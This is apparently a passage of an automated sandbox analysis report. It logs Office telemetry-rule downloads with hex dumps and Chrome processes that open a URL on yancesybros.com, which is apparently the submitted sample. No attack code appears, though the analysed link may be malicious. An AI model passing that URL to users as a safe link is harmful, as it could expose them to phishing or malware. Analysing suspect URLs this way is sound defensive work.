                                                    Content-Type: text/xml
                                                    Content-Length: 472
                                                    Connection: close
                                                    Cache-Control: public, max-age=604800, immutable
                                                    Last-Modified: Tue, 09 Apr 2024 00:25:52 GMT
                                                    ETag: "0x8DC582B9D43097E"
                                                    x-ms-request-id: 413a5bf0-401e-0035-1ab5-3e82d8000000
                                                    x-ms-version: 2018-03-28
                                                    x-azure-ref: 20241125T184501Z-178bfbc474bv7whqhC1NYC1fg400000007xg00000000608p
                                                    x-fd-int-roxy-purgeid: 0
                                                    X-Cache: TCP_HIT
                                                    Accept-Ranges: bytes
                                                    2024-11-25 18:45:01 UTC472INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 33 36 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 33 35 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20
                                                    Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120636" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120635" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />


                                                    Session IDSource IPSource PortDestination IPDestination Port
                                                    84192.168.2.44984213.107.246.63443
                                                    TimestampBytes transferredDirectionData
                                                    2024-11-25 18:45:01 UTC192OUTGET /rules/rule120638v0s19.xml HTTP/1.1
                                                    Connection: Keep-Alive
                                                    Accept-Encoding: gzip
                                                    User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                    Host: otelrules.azureedge.net
                                                    2024-11-25 18:45:01 UTC470INHTTP/1.1 200 OK
                                                    Date: Mon, 25 Nov 2024 18:45:01 GMT
                                                    Content-Type: text/xml
                                                    Content-Length: 486
                                                    Connection: close
                                                    Cache-Control: public, max-age=604800, immutable
                                                    Last-Modified: Tue, 09 Apr 2024 00:25:35 GMT
                                                    ETag: "0x8DC582B92FCB436"
                                                    x-ms-request-id: 09788b64-001e-0046-6eb7-3eda4b000000
                                                    x-ms-version: 2018-03-28
                                                    x-azure-ref: 20241125T184501Z-178bfbc474bv7whqhC1NYC1fg400000007vg00000000c5q5
                                                    x-fd-int-roxy-purgeid: 0
                                                    X-Cache: TCP_HIT
                                                    Accept-Ranges: bytes
                                                    2024-11-25 18:45:01 UTC486INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 33 38 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 33 37 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20
                                                    Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120638" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120637" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />


                                                    Session IDSource IPSource PortDestination IPDestination Port
                                                    85192.168.2.44984113.107.246.63443
                                                    TimestampBytes transferredDirectionData
                                                    2024-11-25 18:45:01 UTC192OUTGET /rules/rule120637v0s19.xml HTTP/1.1
                                                    Connection: Keep-Alive
                                                    Accept-Encoding: gzip
                                                    User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                    Host: otelrules.azureedge.net
                                                    2024-11-25 18:45:01 UTC470INHTTP/1.1 200 OK
                                                    Date: Mon, 25 Nov 2024 18:45:01 GMT
                                                    Content-Type: text/xml
                                                    Content-Length: 427
                                                    Connection: close
                                                    Cache-Control: public, max-age=604800, immutable
                                                    Last-Modified: Tue, 09 Apr 2024 00:26:12 GMT
                                                    ETag: "0x8DC582BA909FA21"
                                                    x-ms-request-id: c86812d3-d01e-005a-35c0-3e7fd9000000
                                                    x-ms-version: 2018-03-28
                                                    x-azure-ref: 20241125T184501Z-178bfbc474bw8bwphC1NYC38b400000007ng00000000hs0q
                                                    x-fd-int-roxy-purgeid: 0
                                                    X-Cache: TCP_HIT
                                                    Accept-Ranges: bytes
                                                    2024-11-25 18:45:01 UTC427INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 33 37 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 33 35 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 28 5b 50 70 5d 5b 41 61 5d 5b 4e 6e 5d 5b 41 61 5d 5b 53 73 5d 5b 4f 6f 5d 5b 4e 6e 5d 5b 49 69 5d 5b 43 63 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 57 22 20
                                                    Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120637" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120635" /> <SR T="2" R="([Pp][Aa][Nn][Aa][Ss][Oo][Nn][Ii][Cc])"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W"


                                                    Session IDSource IPSource PortDestination IPDestination Port
                                                    86192.168.2.44984313.107.246.63443
                                                    TimestampBytes transferredDirectionData
                                                    2024-11-25 18:45:01 UTC192OUTGET /rules/rule120639v0s19.xml HTTP/1.1
                                                    Connection: Keep-Alive
                                                    Accept-Encoding: gzip
                                                    User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                    Host: otelrules.azureedge.net
                                                    2024-11-25 18:45:01 UTC470INHTTP/1.1 200 OK
                                                    Date: Mon, 25 Nov 2024 18:45:01 GMT
                                                    Content-Type: text/xml
                                                    Content-Length: 423
                                                    Connection: close
                                                    Cache-Control: public, max-age=604800, immutable
                                                    Last-Modified: Tue, 09 Apr 2024 00:26:36 GMT
                                                    ETag: "0x8DC582BB7564CE8"
                                                    x-ms-request-id: 043e45ca-501e-0078-1031-3e06cf000000
                                                    x-ms-version: 2018-03-28
                                                    x-azure-ref: 20241125T184501Z-178bfbc474bh5zbqhC1NYCkdug00000007r000000000p2q9
                                                    x-fd-int-roxy-purgeid: 0
                                                    X-Cache: TCP_HIT
                                                    Accept-Ranges: bytes
                                                    2024-11-25 18:45:01 UTC423INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 33 39 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 33 37 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 28 5b 44 64 5d 5b 59 79 5d 5b 4e 6e 5d 5b 41 61 5d 5b 42 62 5d 5b 4f 6f 5d 5b 4f 6f 5d 5b 4b 6b 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 57 22 20 49 3d 22 30
                                                    Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120639" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120637" /> <SR T="2" R="([Dd][Yy][Nn][Aa][Bb][Oo][Oo][Kk])"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W" I="0


                                                    Session IDSource IPSource PortDestination IPDestination Port
                                                    87192.168.2.44984413.107.246.63443
                                                    TimestampBytes transferredDirectionData
                                                    2024-11-25 18:45:03 UTC192OUTGET /rules/rule120640v0s19.xml HTTP/1.1
                                                    Connection: Keep-Alive
                                                    Accept-Encoding: gzip
                                                    User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                    Host: otelrules.azureedge.net
                                                    2024-11-25 18:45:03 UTC470INHTTP/1.1 200 OK
                                                    Date: Mon, 25 Nov 2024 18:45:03 GMT
                                                    Content-Type: text/xml
                                                    Content-Length: 478
                                                    Connection: close
                                                    Cache-Control: public, max-age=604800, immutable
                                                    Last-Modified: Tue, 09 Apr 2024 00:25:48 GMT
                                                    ETag: "0x8DC582B9B233827"
                                                    x-ms-request-id: 9f194ed4-601e-0070-357c-3ba0c9000000
                                                    x-ms-version: 2018-03-28
                                                    x-azure-ref: 20241125T184503Z-174c587ffdfl22mzhC1TEBk40c00000006eg00000000g538
                                                    x-fd-int-roxy-purgeid: 0
                                                    X-Cache: TCP_HIT
                                                    Accept-Ranges: bytes
                                                    2024-11-25 18:45:03 UTC478INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 34 30 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 33 39 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20
                                                    Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120640" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120639" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />


                                                    Session IDSource IPSource PortDestination IPDestination Port
                                                    88192.168.2.44984813.107.246.63443
                                                    TimestampBytes transferredDirectionData
                                                    2024-11-25 18:45:03 UTC192OUTGET /rules/rule120644v0s19.xml HTTP/1.1
                                                    Connection: Keep-Alive
                                                    Accept-Encoding: gzip
                                                    User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                    Host: otelrules.azureedge.net
                                                    2024-11-25 18:45:03 UTC470INHTTP/1.1 200 OK
                                                    Date: Mon, 25 Nov 2024 18:45:03 GMT
                                                    Content-Type: text/xml
                                                    Content-Length: 479
                                                    Connection: close
                                                    Cache-Control: public, max-age=604800, immutable
                                                    Last-Modified: Tue, 09 Apr 2024 00:26:37 GMT
                                                    ETag: "0x8DC582BB7D702D0"
                                                    x-ms-request-id: a94d7e56-901e-0016-7dd1-3eefe9000000
                                                    x-ms-version: 2018-03-28
                                                    x-azure-ref: 20241125T184503Z-15b8b599d88pxmdghC1TEBux9c00000006dg00000000ez5s
                                                    x-fd-int-roxy-purgeid: 0
                                                    X-Cache: TCP_HIT
                                                    Accept-Ranges: bytes
                                                    2024-11-25 18:45:03 UTC479INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 34 34 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 34 33 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20
                                                    Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120644" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120643" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />


                                                    Session IDSource IPSource PortDestination IPDestination Port
                                                    89192.168.2.44984513.107.246.63443
                                                    TimestampBytes transferredDirectionData
                                                    2024-11-25 18:45:03 UTC192OUTGET /rules/rule120641v0s19.xml HTTP/1.1
                                                    Connection: Keep-Alive
                                                    Accept-Encoding: gzip
                                                    User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                    Host: otelrules.azureedge.net
                                                    2024-11-25 18:45:03 UTC470INHTTP/1.1 200 OK
                                                    Date: Mon, 25 Nov 2024 18:45:03 GMT
                                                    Content-Type: text/xml
                                                    Content-Length: 404
                                                    Connection: close
                                                    Cache-Control: public, max-age=604800, immutable
                                                    Last-Modified: Tue, 09 Apr 2024 00:25:39 GMT
                                                    ETag: "0x8DC582B95C61A3C"
                                                    x-ms-request-id: 6056d4b9-d01e-002b-71bf-3e25fb000000
                                                    x-ms-version: 2018-03-28
                                                    x-azure-ref: 20241125T184503Z-178bfbc474b9xljthC1NYCtw9400000007ug000000005nzz
                                                    x-fd-int-roxy-purgeid: 0
                                                    X-Cache: TCP_HIT
                                                    Accept-Ranges: bytes
                                                    2024-11-25 18:45:03 UTC404INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 34 31 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 33 39 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 5e 28 5b 4d 6d 5d 5b 53 73 5d 5b 49 69 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 57 22 20 49 3d 22 30 22 20 4f 3d 22 74 72 75 65 22 3e 0d 0a 20 20 20 20 3c 53
                                                    Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120641" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120639" /> <SR T="2" R="^([Mm][Ss][Ii])"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W" I="0" O="true"> <S


                                                    Session IDSource IPSource PortDestination IPDestination Port
                                                    90192.168.2.44984713.107.246.63443
                                                    TimestampBytes transferredDirectionData
                                                    2024-11-25 18:45:03 UTC192OUTGET /rules/rule120643v0s19.xml HTTP/1.1
                                                    Connection: Keep-Alive
                                                    Accept-Encoding: gzip
                                                    User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                    Host: otelrules.azureedge.net
                                                    2024-11-25 18:45:04 UTC470INHTTP/1.1 200 OK
                                                    Date: Mon, 25 Nov 2024 18:45:04 GMT
                                                    Content-Type: text/xml
                                                    Content-Length: 400
                                                    Connection: close
                                                    Cache-Control: public, max-age=604800, immutable
                                                    Last-Modified: Tue, 09 Apr 2024 00:26:28 GMT
                                                    ETag: "0x8DC582BB2D62837"
                                                    x-ms-request-id: bfe6d614-201e-006e-7a8c-3abbe3000000
                                                    x-ms-version: 2018-03-28
                                                    x-azure-ref: 20241125T184504Z-174c587ffdf59vqchC1TEByk6800000006b000000000y572
                                                    x-fd-int-roxy-purgeid: 0
                                                    X-Cache: TCP_HIT
                                                    Accept-Ranges: bytes
                                                    2024-11-25 18:45:04 UTC400INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 34 33 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 34 31 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 5e 28 5b 4c 6c 5d 5b 47 67 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 57 22 20 49 3d 22 30 22 20 4f 3d 22 74 72 75 65 22 3e 0d 0a 20 20 20 20 3c 53 20 54 3d 22
                                                    Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120643" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120641" /> <SR T="2" R="^([Ll][Gg])"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W" I="0" O="true"> <S T="


                                                    Session IDSource IPSource PortDestination IPDestination Port
                                                    91192.168.2.44984613.107.246.63443
                                                    TimestampBytes transferredDirectionData
                                                    2024-11-25 18:45:03 UTC192OUTGET /rules/rule120642v0s19.xml HTTP/1.1
                                                    Connection: Keep-Alive
                                                    Accept-Encoding: gzip
                                                    User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                    Host: otelrules.azureedge.net
                                                    2024-11-25 18:45:04 UTC470INHTTP/1.1 200 OK
                                                    Date: Mon, 25 Nov 2024 18:45:04 GMT
                                                    Content-Type: text/xml
                                                    Content-Length: 468
                                                    Connection: close
                                                    Cache-Control: public, max-age=604800, immutable
                                                    Last-Modified: Tue, 09 Apr 2024 00:26:24 GMT
                                                    ETag: "0x8DC582BB046B576"
                                                    x-ms-request-id: 414c800a-401e-0035-7cbf-3e82d8000000
                                                    x-ms-version: 2018-03-28
                                                    x-azure-ref: 20241125T184504Z-178bfbc474b7cbwqhC1NYC8z4n00000007s000000000ee0a
                                                    x-fd-int-roxy-purgeid: 0
                                                    X-Cache: TCP_HIT
                                                    Accept-Ranges: bytes
                                                    2024-11-25 18:45:04 UTC468INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 34 32 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 34 31 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20
                                                    Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120642" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120641" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />


                                                    Click to jump to process

                                                    Click to jump to process

                                                    Click to jump to process

                                                    Target ID:0
                                                    Start time:13:43:40
                                                    Start date:25/11/2024
                                                    Path:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                    Wow64 process (32bit):false
                                                    Commandline:"C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized "about:blank"
                                                    Imagebase:0x7ff76e190000
                                                    File size:3'242'272 bytes
                                                    MD5 hash:45DE480806D1B5D462A7DDE4DCEFC4E4
                                                    Has elevated privileges:true
                                                    Has administrator privileges:true
                                                    Programmed in:C, C++ or other language
                                                    Reputation:low
                                                    Has exited:false

                                                    Target ID:2
                                                    Start time:13:43:43
                                                    Start date:25/11/2024
                                                    Path:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                    Wow64 process (32bit):false
                                                    Commandline:"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2252 --field-trial-handle=2200,i,14020259663435035304,8067086571185924884,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8
                                                    Imagebase:0x7ff76e190000
                                                    File size:3'242'272 bytes
                                                    MD5 hash:45DE480806D1B5D462A7DDE4DCEFC4E4
                                                    Has elevated privileges:true
                                                    Has administrator privileges:true
                                                    Programmed in:C, C++ or other language
                                                    Reputation:low
                                                    Has exited:false

                                                    Target ID:3
                                                    Start time:13:43:45
                                                    Start date:25/11/2024
                                                    Path:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                    Wow64 process (32bit):false
                                                    Commandline:"C:\Program Files\Google\Chrome\Application\chrome.exe" "https://yancesybros.com/WHF9842BVD.html"
                                                    Imagebase:0x7ff76e190000
                                                    File size:3'242'272 bytes
                                                    MD5 hash:45DE480806D1B5D462A7DDE4DCEFC4E4
                                                    Has elevated privileges:true
                                                    Has administrator privileges:true
                                                    Programmed in:C, C++ or other language
                                                    Reputation:low
                                                    Has exited:true

                                                    No disassembly